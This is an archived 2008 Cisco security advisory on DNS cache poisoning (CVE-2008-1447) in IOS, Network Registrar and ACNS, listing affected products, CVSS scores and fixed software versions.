Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From psirt at cisco.com Tue Jul 8 19:36:40 2008
From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team)
Date: Tue, 8 Jul 2008 14:36:40 -0400
Subject: [Full-disclosure] Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks
Message-ID: <200807081436.dns@psirt.cisco.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks

Advisory ID: cisco-sa-20080708-dns

http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml

Revision 1.0

For Public Release 2008 July 08 1800 UTC (GMT)

Summary
=======

Multiple Cisco products are vulnerable to DNS cache poisoning attacks due to their use of insufficiently randomized DNS transaction IDs and UDP source ports in the DNS queries that they produce, which may allow an attacker to more easily forge DNS answers that can poison DNS caches.

To exploit this vulnerability an attacker must be able to cause a vulnerable DNS server to perform recursive DNS queries. Therefore, DNS servers that are only authoritative, or servers where recursion is not allowed, are not affected.

Cisco has released free software updates that address this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml.

This security advisory is being published simultaneously with announcements from other affected organizations.

Affected Products
=================

Products that cache DNS responses and process DNS messages with the recursion desired (RD) flag set may be vulnerable to a DNS cache poisoning attack depending on implementation of the DNS protocol. Products that process DNS messages with the RD flag set will attempt to answer the question asked on behalf of the client. A product is only affected if using a vulnerable implementation of the DNS protocol, the DNS server functionality for the product is enabled, and the DNS feature for the product is configured to process recursive DNS query messages.

Vulnerable Products
+------------------

The following Cisco products are capable of acting as DNS servers and have been found to have the DNS implementation weakness that makes some types of DNS cache poisoning attacks more likely to succeed:

  * Cisco IOS Software

    A device that is running Cisco IOS Software will be affected if it is running a vulnerable version and if it is acting as a DNS server.

    All Cisco IOS Software releases that support the DNS server functionality and that have not had their DNS implementation improved are affected. For information about specific fixed versions, please refer to the Software Versions and Fixes section.

    A device that is running Cisco IOS Software is configured to act as a DNS server if the command "ip dns server" is present in the configuration. This command is not enabled by default.

  * Cisco Network Registrar

    All Cisco Network Registrar versions are affected, and DNS services are enabled by default.

    The DNS server on CNR is enabled via the command-line interface (CLI) commands "server dns enable start-on-reboot" or "dns enable start-on-reboot" or via the web management interface in the Servers page by selecting the appropriate "Start," "Stop," or "Reload" button.

  * Cisco Application and Content Networking System

    All Cisco Application and Content Networking System (ACNS) versions are affected; DNS services are disabled by default.

    ACNS is configured to act as a DNS server if the command "dns enable" is present in the configuration.

  * Cisco Global Site Selector Used in Combination with Cisco Network Registrar

    The Cisco Global Site Selector (GSS) is affected when it is used in combination with Cisco Network Registrar software to provide a more complete DNS solution. Fixed software would come in the form of an update of the Cisco Network Registrar software rather than an update of the GSS software.

Products Confirmed Not Vulnerable
+--------------------------------

Products that do not offer DNS server capabilities are not affected by this vulnerability.

The Cisco GSS by itself is not affected by this vulnerability. However, it is affected when it is used with Cisco Network Registrar software.

No other Cisco products are currently known to be affected by these vulnerabilities.

Details
=======

The Domain Name System is an integral part of networks that are based on TCP/IP such as the Internet. Simply stated, the Domain Name System is a hierarchical database that contains mappings of hostnames and IP addresses. The DNS protocol is part of the TCP/IP protocol suite and allows DNS clients to query the DNS database to resolve hostnames to IP addresses.

A DNS server is an application that implements the DNS protocol and that has the ability to respond to queries made by DNS clients. When handling a query from a DNS client, a DNS server can look into its portion of the global DNS database (if the query is for a portion of the DNS database for which the DNS server is authoritative), or it can relay the query to other DNS servers (if it is configured to do so and if the query is for a portion of the DNS database for which the DNS server is not authoritative.)

Because of the processing time and bandwidth that is associated with handling a DNS query, most DNS servers locally store responses that are received from other DNS servers. The area where these responses are stored locally is called a "cache." Once a response is stored in a cache, the DNS server can use the locally stored response for a certain time (called the "time to live") before having to query DNS servers again to refresh the local (cached) copy of the response.

A DNS cache poisoning attack is an attack in which an entry in the DNS cache of a DNS server is changed so the IP address associated with a hostname in the cache does not point to the correct place.
For example, if www.example.com is mapped to the IP address 192.168.0.1 and this mapping is present in the cache of a DNS server, an attacker who succeeds in poisoning the DNS cache of this server may be able to map www.example.com to 10.0.0.1 instead. If this happens, a user who is trying to visit www.example.com may end up contacting the wrong web server.

Although DNS cache poisoning attacks are not new, a security researcher recently presented a technique that allows an attacker to mount successful DNS cache poisoning attacks with low complexity tools and low traffic requirements. This technique exploits a weakness in most implementations of the DNS protocol.

The fundamental implementation weakness is that the DNS transaction ID and source port number used to validate DNS responses are not sufficiently randomized and can easily be predicted, which allows an attacker to create forged responses to DNS queries that will match the expected values. The DNS server will consider such responses to be valid.

The following Cisco products that offer DNS server functionality have been found to be susceptible to DNS cache poisoning attacks:

  * Cisco IOS Software: The vulnerability documented in Cisco bug ID CSCso81854.

  * Cisco Network Registrar: The vulnerability documented in Cisco bug ID CSCsq01298.

  * Cisco Application and Content Networking System (ACNS): The vulnerability documented in Cisco bug ID CSCsq21930.

This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-1447.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score.
Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

Cisco Bugs:

  * DNS cache prone to poisoning/forged answers attacks (CSCsq21930)

  * DNS susceptible to forged query response attacks (CSCsq01298)

  * Need to make DNS implementation more resilient against forged answers (CSCso81854)

CVSS Base Score - 6.4
    Access Vector - Network
    Access Complexity - Low
    Authentication - None
    Confidentiality Impact - None
    Integrity Impact - Partial
    Availability Impact - Partial

CVSS Temporal Score - 5.3
    Exploitability - Functional
    Remediation Level - Official-Fix
    Report Confidence - Confirmed

(same score for the three Cisco bugs listed above.)

Impact
======

Successful exploitation of the vulnerability described in this document may result in invalid hostname-to-IP address mappings in the cache of an affected DNS server. This may lead users of this DNS server to contact the wrong provider of network services. The ultimate impact varies greatly, ranging from a simple denial of service (for example, making www.example.com resolve to 127.0.0.1) to phishing and financial fraud.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release.
If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

Cisco IOS Software
+-----------------

Each row of the Cisco IOS Software table (below) names a Cisco IOS Software release train. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. The "Recommended Release" column indicates the releases which have fixes for all the published vulnerabilities at the time of this Advisory. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" column of the table.

+------------------------------------------------------------------+
| Major Release | Availability of Repaired Releases |
|------------------------------------------------------------------|
| Affected 12.0-Based Releases | First Fixed Release | Recommended Release |
|------------------------------------------------------------------|
| 12.0 | Not Vulnerable | |
| 12.0DA | Not Vulnerable | |
| 12.0DB | Releases prior to 12.0(7)DB are vulnerable, release 12.0(7)DB and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.0DC | Releases prior to 12.0(7)DC are vulnerable, release 12.0(7)DC and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.0S | Not Vulnerable | |
| 12.0SC | Not Vulnerable | |
| 12.0SL | Not Vulnerable | |
| 12.0SP | Not Vulnerable | |
| 12.0ST | Not Vulnerable | |
| 12.0SX | Not Vulnerable | |
| 12.0SY | Not Vulnerable | |
| 12.0SZ | Not Vulnerable | |
| 12.0T | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.0W | Not Vulnerable | |
| 12.0WC | Vulnerable; contact TAC | |
| 12.0WT | Not Vulnerable | |
| 12.0XA | Not Vulnerable | |
| 12.0XB | Not Vulnerable | |
| 12.0XC | Not Vulnerable | |
| 12.0XD | Not Vulnerable | |
| 12.0XE | Note: Releases prior to 12.0(7)XE1 are vulnerable, release 12.0(7)XE1 and later are not vulnerable; | |
| 12.0XF | Not Vulnerable | |
| 12.0XG | Not Vulnerable | |
| 12.0XH | Not Vulnerable | |
| 12.0XI | Not Vulnerable | |
| 12.0XJ | Not Vulnerable | |
| 12.0XK | Releases prior to 12.0(7)XK2 are vulnerable, release 12.0(7)XK2 and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.0XL | Not Vulnerable | |
| 12.0XM | Not Vulnerable | |
| 12.0XN | Not Vulnerable | |
| 12.0XQ | Not Vulnerable | |
| 12.0XR | Releases prior to 12.0(7)XR1 are vulnerable, release 12.0(7)XR1 and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.0XS | Not Vulnerable | |
| 12.0XV | Not Vulnerable | |
| 12.0XW | Not Vulnerable | |
|------------------------------------------------------------------|
| Affected 12.1-Based Releases | First Fixed Release | Recommended Release |
|------------------------------------------------------------------|
| 12.1 | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.1AA | Not Vulnerable | |
| 12.1AX | Not Vulnerable | |
| 12.1AY | Releases prior to 12.1(22)AY1 are vulnerable, release 12.1(22)AY1 and later are not vulnerable; | 12.1(22)EA11 |
| 12.1AZ | Not Vulnerable | |
| 12.1CX | Not Vulnerable | |
| 12.1DA | Not Vulnerable | |
| 12.1DB | Releases prior to 12.1(4)DB1 are vulnerable, release 12.1(4)DB1 and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.1DC | Releases prior to 12.1(4)DC2 are vulnerable, release 12.1(4)DC2 and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.1E | Not Vulnerable | |
| 12.1EA | Releases prior to 12.1(11)EA1 are vulnerable, release 12.1(11)EA1 and later are not vulnerable; | 12.1(22)EA11 |
| 12.1EB | Not Vulnerable | |
| 12.1EC | Not Vulnerable | |
| 12.1EO | Not Vulnerable | |
| 12.1EU | Not Vulnerable | |
| 12.1EV | Not Vulnerable | |
| 12.1EW | Not Vulnerable | |
| 12.1EX | Note: Releases prior to 12.1(8a)EX are vulnerable, release 12.1(8a)EX and later are not vulnerable; | |
| 12.1EY | Not Vulnerable | |
| 12.1EZ | Not Vulnerable | |
| 12.1GA | Not Vulnerable | |
| 12.1GB | Not Vulnerable | |
| 12.1T | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.1XA | Not Vulnerable | |
| 12.1XB | Not Vulnerable | |
| 12.1XC | Releases prior to 12.1(1)XC1 are vulnerable, release 12.1(1)XC1 and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.1XD | Not Vulnerable | |
| 12.1XE | Not Vulnerable | |
| 12.1XF | Not Vulnerable | |
| 12.1XG | Not Vulnerable | |
| 12.1XH | Not Vulnerable | |
| 12.1XI | Not Vulnerable | |
| 12.1XJ | Not Vulnerable | |
| 12.1XK | Not Vulnerable | |
| 12.1XL | Not Vulnerable | |
| 12.1XM | Not Vulnerable | |
| 12.1XN | Not Vulnerable | |
| 12.1XO | Not Vulnerable | |
| 12.1XP | Not Vulnerable | |
| 12.1XQ | Not Vulnerable | |
| 12.1XR | Not Vulnerable | |
| 12.1XS | Not Vulnerable | |
| 12.1XT | Not Vulnerable | |
| 12.1XU | Not Vulnerable | |
| 12.1XV | Not Vulnerable | |
| 12.1XW | Not Vulnerable | |
| 12.1XX | Not Vulnerable | |
| 12.1XY | Not Vulnerable | |
| 12.1XZ | Not Vulnerable | |
| 12.1YA | Not Vulnerable | |
| 12.1YB | Not Vulnerable | |
| 12.1YC | Not Vulnerable | |
| 12.1YD | Not Vulnerable | |
| 12.1YE | Note: Releases prior to 12.1(5)YE1 are vulnerable, release 12.1(5)YE1 and later are not vulnerable; | 12.4(19a), 12.4(19b) |
| 12.1YF | Not Vulnerable | |
| 12.1YG | Not Vulnerable | |
| 12.1YH | Not Vulnerable | |
| 12.1YI | Not Vulnerable | |
| 12.1YJ | Not Vulnerable | |
|------------------------------------------------------------------|
| Affected 12.2-Based Releases | First Fixed Release | Recommended Release |
|------------------------------------------------------------------|
| 12.2 | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2B | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2BC | Not Vulnerable | |
| 12.2BW | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2BY | Releases prior to 12.2(8)BY are vulnerable, release 12.2(8)BY and later are not vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2BZ | Not Vulnerable | |
| 12.2CX | Not Vulnerable | |
| 12.2CY | Not Vulnerable | |
| 12.2CZ | Vulnerable; contact TAC | |
| 12.2DA | Not Vulnerable | |
| 12.2DD | Not Vulnerable | |
| 12.2DX | Not Vulnerable | |
| 12.2EU | Not Vulnerable | |
| 12.2EW | Not Vulnerable | |
| 12.2EWA | Not Vulnerable | |
| 12.2EX | Not Vulnerable | |
| 12.2EY | Not Vulnerable | |
| 12.2EZ | Not Vulnerable | |
| 12.2FX | Not Vulnerable | |
| 12.2FY | Not Vulnerable | |
| 12.2FZ | Not Vulnerable | |
| 12.2IXA | Not Vulnerable | |
| 12.2IXB | Not Vulnerable | |
| 12.2IXC | Not Vulnerable | |
| 12.2IXD | Not Vulnerable | |
| 12.2IXE | Not Vulnerable | |
| 12.2IXF | Not Vulnerable | |
| 12.2JA | Not Vulnerable | |
| 12.2JK | Not Vulnerable | |
| 12.2MB | Not Vulnerable | |
| 12.2MC | Not Vulnerable | |
| 12.2S | Not Vulnerable | |
| 12.2SB | Not Vulnerable | |
| 12.2SBC | Not Vulnerable | |
| 12.2SCA | Not Vulnerable | |
| 12.2SE | Not Vulnerable | |
| 12.2SEA | Not Vulnerable | |
| 12.2SEB | Not Vulnerable | |
| 12.2SEC | Not Vulnerable | |
| 12.2SED | Not Vulnerable | |
| 12.2SEE | Not Vulnerable | |
| 12.2SEF | Not Vulnerable | |
| 12.2SEG | Not Vulnerable | |
| 12.2SG | Not Vulnerable | |
| 12.2SGA | Not Vulnerable | |
| 12.2SL | Not Vulnerable | |
| 12.2SM | Not Vulnerable | |
| 12.2SO | Not Vulnerable | |
| 12.2SRA | Not Vulnerable | |
| 12.2SRB | Not Vulnerable | |
| 12.2SRC | Not Vulnerable | |
| 12.2SU | Not Vulnerable | |
| 12.2SV | Not Vulnerable | |
| 12.2SVA | Not Vulnerable | |
| 12.2SVC | Not Vulnerable | |
| 12.2SVD | Not Vulnerable | |
| 12.2SW | Not Vulnerable | |
| 12.2SX | Not Vulnerable | |
| 12.2SXA | Not Vulnerable | |
| 12.2SXB | Not Vulnerable | |
| 12.2SXD | Not Vulnerable | |
| 12.2SXE | Not Vulnerable | |
| 12.2SXF | Not Vulnerable | |
| 12.2SXH | Not Vulnerable | |
| 12.2SXI | Not Vulnerable | |
| 12.2SY | Not Vulnerable | |
| 12.2SZ | Not Vulnerable | |
| 12.2T | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2TPC | Releases prior to 12.2(8)TPC10d are vulnerable, release 12.2(8)TPC10d and later are not vulnerable; | |
| 12.2UZ | Not Vulnerable | |
| 12.2XA | Not Vulnerable | |
| 12.2XB | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XC | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XD | Not Vulnerable | |
| 12.2XE | Not Vulnerable | |
| 12.2XF | Not Vulnerable | |
| 12.2XG | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XH | Not Vulnerable | |
| 12.2XI | Not Vulnerable | |
| 12.2XJ | Not Vulnerable | |
| 12.2XK | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XL | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XM | Not Vulnerable | |
| 12.2XN | Not Vulnerable | |
| 12.2XNA | Not Vulnerable | |
| 12.2XO | Not Vulnerable | |
| 12.2XQ | Not Vulnerable | |
| 12.2XR | Not Vulnerable | |
| 12.2XS | Not Vulnerable | |
| 12.2XT | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XU | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2XV | Not Vulnerable | |
| 12.2XW | Not Vulnerable | |
| 12.2YA | Not Vulnerable | |
| 12.2YB | Not Vulnerable | |
| 12.2YC | Not Vulnerable | |
| 12.2YD | Not Vulnerable | |
| 12.2YE | Not Vulnerable | |
| 12.2YF | Not Vulnerable | |
| 12.2YG | Not Vulnerable | |
| 12.2YH | Not Vulnerable | |
| 12.2YJ | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YK | Not Vulnerable | |
| 12.2YL | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YM | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YN | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YO | Vulnerable; migrate to any release in 12.2SY | 12.2(18)SXF15; Available on 08-AUG-08 |
| 12.2YP | Not Vulnerable | |
| 12.2YQ | Not Vulnerable | |
| 12.2YR | Not Vulnerable | |
| 12.2YS | Not Vulnerable | |
| 12.2YT | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YU | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YV | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2YW | Not Vulnerable | |
| 12.2YX | Not Vulnerable | |
| 12.2YY | Not Vulnerable | |
| 12.2YZ | Not Vulnerable | |
| 12.2ZA | Not Vulnerable | |
| 12.2ZB | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2ZC | Not Vulnerable | |
| 12.2ZD | Vulnerable; contact TAC | |
| 12.2ZE | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2ZF | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2ZG | Vulnerable; first fixed in 12.4T | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.2ZH | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.2ZJ | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.2ZL | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.2ZP | Not Vulnerable | |
| 12.2ZU | Not Vulnerable | |
| 12.2ZY | Not Vulnerable | |
| 12.2ZYA | Not Vulnerable | |
|------------------------------------------------------------------|
| Affected 12.3-Based Releases | First Fixed Release | Recommended Release |
|------------------------------------------------------------------|
| 12.3 | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3B | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3BC | Not Vulnerable | |
| 12.3BW | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3EU | Not Vulnerable | |
| 12.3JA | Not Vulnerable | |
| 12.3JEA | Not Vulnerable | |
| 12.3JEB | Not Vulnerable | |
| 12.3JEC | Not Vulnerable | |
| 12.3JK | Not Vulnerable | |
| 12.3JL | Not Vulnerable | |
| 12.3JX | Not Vulnerable | |
| 12.3T | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3TPC | Vulnerable; contact TAC | |
| 12.3VA | Vulnerable; contact TAC | |
| 12.3XA | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.3XB | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XC | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.3XD | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XE | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.3XF | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XG | Vulnerable; first fixed in 12.4T | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.3XH | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XI | Vulnerable; contact TAC | |
| 12.3XJ | Vulnerable; first fixed in 12.3YX | 12.3(14)YX12, 12.4(20)T; Available on 11-JUL-08 |
| 12.3XK | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XQ | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XR | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.3XS | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b) |
| 12.3XU | Not Vulnerable | |
| 12.3XW | Vulnerable; first fixed in 12.3YX | 12.3(14)YX12, 12.4(20)T; Available on 11-JUL-08 |
| 12.3XY | Not Vulnerable | |
| 12.3YA | Vulnerable; first fixed in 12.4 | 12.4(19a), 12.4(19b), 12.4(20)T; Available on 11-JUL-08 |
| 12.3YD | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YF | Vulnerable; first fixed in 12.3YX | 12.3(14)YX12, 12.4(20)T; Available on 11-JUL-08 |
| 12.3YG | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YH | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YI | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YJ | Not Vulnerable | |
| 12.3YK | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YM | Releases prior to 12.3(14)YM12 are vulnerable, release 12.3(14)YM12 and later are not vulnerable; | 12.3(14)YM12 |
| 12.3YQ | Not Vulnerable | |
| 12.3YS | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YT | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.3YU | Vulnerable; first fixed in 12.4XB | |
| 12.3YX | 12.3(14)YX12 | 12.3(14)YX12 |
| 12.3YZ | Vulnerable; contact TAC | |
|------------------------------------------------------------------|
| Affected 12.4-Based Releases | First Fixed Release | Recommended Release |
|------------------------------------------------------------------|
| 12.4 | 12.4(18b), 12.4(19a), 12.4(19b), 12.4(21) | 12.4(19a), 12.4(19b) |
| 12.4JA | Not Vulnerable | |
| 12.4JK | Not Vulnerable | |
| 12.4JMA | Not Vulnerable | |
| 12.4JMB | Not Vulnerable | |
| 12.4JMC | Not Vulnerable | |
| 12.4JX | Not Vulnerable | |
| 12.4MD | 12.4(15)MD | 12.4(15)MD |
| 12.4MR | 12.4(19)MR | 12.4(19)MR |
| 12.4SW | Vulnerable; contact TAC | |
| 12.4T | 12.4(15)T6, 12.4(20)T; Available on 11-JUL-08 | 12.4(20)T; Available on 11-JUL-08 |
| 12.4XA | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.4XB | 12.4(2)XB10 | |
| 12.4XC | Vulnerable; contact TAC | |
| 12.4XD | 12.4(4)XD11; Available on 31-JUL-08 | 12.4(20)T; Available on 11-JUL-08 |
| 12.4XE | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.4XF | Not Vulnerable | |
| 12.4XG | Not Vulnerable | |
| 12.4XJ | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
| 12.4XK | Not Vulnerable | |
| 12.4XL | 12.4(15)XL2 | 12.4(15)XL2 |
| 12.4XM | 12.4(15)XM1 | 12.4(15)XM1 |
| 12.4XN | Vulnerable; contact TAC | |
| 12.4XQ | Vulnerable; contact TAC | |
| 12.4XT | Vulnerable; contact TAC | |
| 12.4XV | Vulnerable; contact TAC | |
| 12.4XW | 12.4(11)XW8 | 12.4(11)XW6 |
| 12.4XY | 12.4(15)XY3 | |
| 12.4XZ | Vulnerable; first fixed in 12.4T | 12.4(20)T; Available on 11-JUL-08 |
+------------------------------------------------------------------+

Cisco Network Registrar
+----------------------

+------------------------------------------------------------------+
| Affected Release Train | First Fixed Release |
|------------------------------------------------------------------|
| 6.1.x | Contact TAC |
| 6.3.x | 6.3.1.1 patch; available mid-July 2008 |
| 7.0.x | 7.0.1; available in mid-July 2008 |
+------------------------------------------------------------------+

Cisco Network Registrar software is available for download at:

http://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval

Cisco Application and Content Networking System
+----------------------------------------------

This issue is fixed in version 5.5.11 of Cisco ACNS software. This release will be available for download from www.cisco.com in late July 2008.

Cisco ACNS 5.5 software is available for download at: http://www.cisco.com/pcgi-bin/tablebuild.pl/acns55

Workarounds
===========

There are no workarounds.

Additional information about identification and mitigation of attacks against DNS is in the Cisco Applied Intelligence white paper "DNS Best Practices, Network Protections, and Attack Identification," available at http://www.cisco.com/web/about/security/intelligence/dns-bcp.html.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac at cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

Although DNS cache poisoning attacks are not new, security researcher Dan Kaminsky of IOActive recently presented a technique that makes DNS cache poisoning attacks more likely to succeed. Cisco would like to thank Dan Kaminsky for notifying vendors about his findings.

Note that vulnerability information for Cisco IOS Software is being provided in this advisory outside of the announced publication schedule for Cisco IOS Software described at http://www.cisco.com/go/psirt due to industry-wide disclosure of the vulnerability.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

  * cust-security-announce at cisco.com
  * first-teams at first.org
  * bugtraq at securityfocus.com
  * vulnwatch at vulnwatch.org
  * cisco at spot.colorado.edu
  * cisco-nsp at puck.nether.net
